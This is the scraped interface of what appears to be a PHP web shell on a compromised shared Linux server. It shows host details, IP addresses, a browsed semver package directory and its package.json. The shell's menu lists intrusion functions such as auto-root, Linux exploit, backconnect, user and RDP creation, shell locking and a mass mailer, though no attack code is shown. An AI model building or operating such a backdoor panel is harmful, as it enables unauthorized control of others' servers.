Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
semver /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
internal
[ DIR ]
drwxr-xr-x
ranges
[ DIR ]
drwxr-xr-x
index.js
1.94
KB
-rw-r--r--
package.json
815
B
-rw-r--r--
preload.js
69
B
-rw-r--r--
range.bnf
619
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "semver", "version": "7.3.5", "description": "The semantic version parser used by npm.", "main": "index.js", "scripts": { "test": "tap", "snap": "tap", "preversion": "npm test", "postversion": "npm publish", "postpublish": "git push origin --follow-tags" }, "devDependencies": { "tap": "^14.10.7" }, "license": "ISC", "repository": "https://github.com/npm/node-semver", "bin": { "semver": "bin/semver.js" }, "files": [ "bin/**/*.js", "range.bnf", "classes/**/*.js", "functions/**/*.js", "internal/**/*.js", "ranges/**/*.js", "index.js", "preload.js" ], "tap": { "check-coverage": true, "coverage-map": "map.js" }, "engines": { "node": ">=10" }, "dependencies": { "lru-cache": "^6.0.0" } }
Close